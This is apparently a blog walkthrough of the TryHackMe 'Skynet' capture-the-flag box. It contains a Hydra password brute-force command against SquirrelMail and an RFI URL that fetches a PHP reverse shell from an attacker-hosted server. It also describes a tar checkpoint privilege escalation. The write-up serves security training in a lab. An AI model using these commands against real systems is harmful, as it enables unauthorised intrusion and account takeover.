Open in app

Sign up

Sign in

Write

Sign up

Sign in

Skynet -THM

gh0stsh3ll5619
System Weakness
Published in
8 min readJan 31, 2023

--

Skynet

Were back again working another box from Try Hack me called Skynet. This is a Linux machine where we gain initial access from a SAMBA server. From there we enumerate a web application, where we password spray to gain access to the application to find critical information to escalate privileges on the SAMBA server. From there we find a hidden sub directory to find another login location where we must exploit it to gain initial access to the box. Then we must come up with a creative way to escalate privileges. Let's get into it.

We start as normal with our initial enumeration with Nmap.

nmap -sC -sV 10.10.50.71

We see that we get some ports back. 22,80,110,139,143, and 445. Looking at this information were going to start with enumerating port 139 and 445.

So, I start with nmblookup and smbclient to get an understanding of the server.

So, we see we have an anonymous share as well as one called milesdyson. Let's try using enum4linux next to get a further enumeration.

enum4linux -a

We see that we get a lot of information like password length SID and share information and system OS and name.

Next let's connect to the anonymous share with smbclient.

smbclient //10.10.11.55/anonymous

Since this is anonymous when the password prompt is present let's just hit enter to see if it needs creds. We see that we don't need one and we have access.

We see that we have a file so let's grab the file to see what's in it, and further enumerate the logs directory.

We see that the passwords were all changed so let's look at the logs. We do see one file that sticks out so let's look at it.

We see that this might be a username or password list so let's keep it in case we need to use it. Since we're not seeing anything else let's move to enumerating port 80 HTTP.

dirb http://www.10.10.50.71

We see that we found some directories so lets look at /admin and /squirrelmail.

We see this is a login page. So, taking on the information we found about the passwords let's use that for the passwords and try the username we know about “milesdyson”.

So, we can brute force this with Hydra or use burp to password spray. Since this is a web application, we need some information to perform the attack.

To start lets open the developer tool with F12. We need to get the POST information and the error information that was provided.

Using Hydra, we gathered the information and can now run the brute force.

hydra -l milesdyson -P log1.txt 10.10.87.63 -V http-form-post ‘/squirrelmail/src/redirect.php:login=^milesdyson^PASS^:Username or password invalid’

We see that we get a lot of information that we can test. We can also do this with burp as mentioned.

We start by capturing the request and send it to intruder.

We then select our username and password section for where our payload will be used. We will use the cluster bomb technique. Make sure to set payload1 and milesdyson and payload2 as the .txt file we found.

We now look at whats different. We look at the status code and the length which is the first highlighted section.

Let’s login in with these creds and we see that we gain access.

Lets look at the first email with the Samba Password reset.

We see that we have the new password. Looking at the other emails we see they are HEX dumps. Let's try to get decrypt it, but no information came from it.

Let's login to the share using the password we found.

smbclient //10.10.146.234/milesdyson -U milesdyson

We see that we have some files listed and a directory called notes. Im interested in the directory so lets look at that.

We see hidden within all the notes there is one that sticks out called important.txt so let's grab that. Well do this with our get command.

Now let's cat the file to see what’s inside.

We see that we found a new CMS with the directory so let's navigate to that.

We see that its Miles Dysons Personal Page. Since we found a new location lets run some directory enumeration on this with dirb to see if we can find anything else. Also i look through the source code but no informaotin was provided.

dirb https://10.10.146.234/45kra24zxs28v3yd

We see that we that we found a /guestbook and /administrator. So, let's see what that admin has to offer.

So, heading to the directory we see that it is a login page. It is called Cuppa CMS. We can try to enumerate further but we see nothing else is really provided. So, let's use searchsploit to see if there is anything we can use to exploit it.

We do find that there is 1 exploit for this so let's grab it and read what it says. The exploit states that we can perform and LFI to see if it works then push an RCE with our own shell in the URL. So, lets test to see if the LFI works.

Exploit Information.

We can see that the exploit worked, and we were able to pull the /etc/passwd information out.

Now let's get a .php shell into a file and try to submit it like the exploit states. ** Remember that we need to host the reverse shell.** We can do this with our python server.

python3 -m simple.server

http://10.10.79.63/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.9.69:8000/shell.php

Before we send the request make sure you start a netcat listener to catch our shell.

We see that it worked, and we now have a shell.

Let's look to see what we can find. Here you should have found the user.txt file. We also find some files called backup.sh and backup.tgz.

Let's cat the .sh file to see what it is.

We see that it's a script that create a backup. This is probably using a cronjob. Let's try sudo -l to see if there is a way to conduct privilege escalation. It doesn't work though so more than likely were going to need to exploit tar or the cronjob.

Let's look at the cron jobs to make sure this is correct.

So, let's look at gtfobins to see if there is anything we can do. We do see that we can escalate with tar.

Lets go back to our /var/www/html directory and run the tar command to run the — checkpoint exploit. This will allow us to view all the information within that directory.

We see that the CLI is hung allowing us to run a bash script so let's put in a bash 1 liner reverse shell in to see if it will execute it when ran.

Make sure you start another NC listener so that we can catch this shell. Now let's finish the rest of the checkpoint attack. First, I make the directory executable so we can run the command.

We see that we have a connection to our new net cat listener.

We can see that we are now root. Now let's navigate to /root to cat our root.txt file.

Congrats! We have exploited another box; this one was a fun one that did have some rabbit holes where it took me a little longer to complete. Rember to pay attention to the software that is being used. It took me a while to realize that this would be a TAR privilege escalation attempt.

Please let me know if there is anything else you like to see or work through! Hopefully will have some more walkthroughs for everyone soon. Thanks for the visit and hope this could help.

Tryhackme Walkthrough
Tryhackme Writeup
Tryhackme
Tryhackme Skynet
Penetration Testing

--

--

gh0stsh3ll5619
System Weakness
Follow

Written by gh0stsh3ll5619

12 Followers

Penetration Tester for 8 year. For Tactical Testing follow aressec.net Follow me as I complete boxes to better sharpen my skill and provided tips on pentesting.

Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams